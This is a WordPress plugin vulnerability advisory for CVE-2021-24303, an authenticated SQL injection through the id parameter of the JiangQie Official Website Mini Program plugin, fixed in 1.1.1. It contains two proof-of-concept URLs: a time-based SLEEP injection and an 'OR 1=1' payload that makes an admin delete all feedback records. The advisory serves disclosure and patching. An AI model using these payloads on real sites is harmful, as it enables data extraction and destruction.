JiangQie Official Website Mini Program < 1.1.1 – Authenticated SQL Injection | CVE 2021-24303 | Plugin Vulnerabilities

Description

The plugin does not escape or validate the id GET parameter before using it in SQL statements, leading to SQL injection issues

Proof of Concept

https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=detail&id=1+AND+%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29a%29

Could also make a logged in admin delete all the records: https://example.com/wp-admin/admin.php?page=jiangqie_ow_free_feedback&action=delete&id=1+OR+1%3D1

Affects Plugins

jiangqie-official-website-mini-program

Fixed in 1.1.1

References

CVE

URL

https://github.com/ja9er/CVEProject/blob/main/wordpress_jiangqie-official-website-mini-program_sqli.md

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

wangxiaohui@webray.com.cn inc

Submitter

wangxiaohui@webray.com.cn inc

Verified

Yes

WPVDB ID

cbd65b7d-d3c3-4ee3-8e5e-ff0eeeaa7b30

Timeline

Publicly Published

2021-07-30 (about 2 years ago)

Added

2021-08-05 (about 2 years ago)

Last Updated

2021-08-10 (about 2 years ago)

Other

Published

Title

Published

2014-08-01

Title

Advertizer <= 1.0 - SQL Injection

Published

2024-05-14

Title

Alt Text AI – Automatically generate image alt text for SEO and accessibility < 1.5.0 - Authenticated (Subscriber+) SQL Injection

Published

2015-02-21

Title

Gallery Bank <= 3.0.101 - SQL Injection

Published

2023-07-12

Title

User Activity Log < 1.6.3 - Admin+ SQLi

Published

2022-12-09

Title

LetsRecover < 1.2.0 - Admin+ SQLi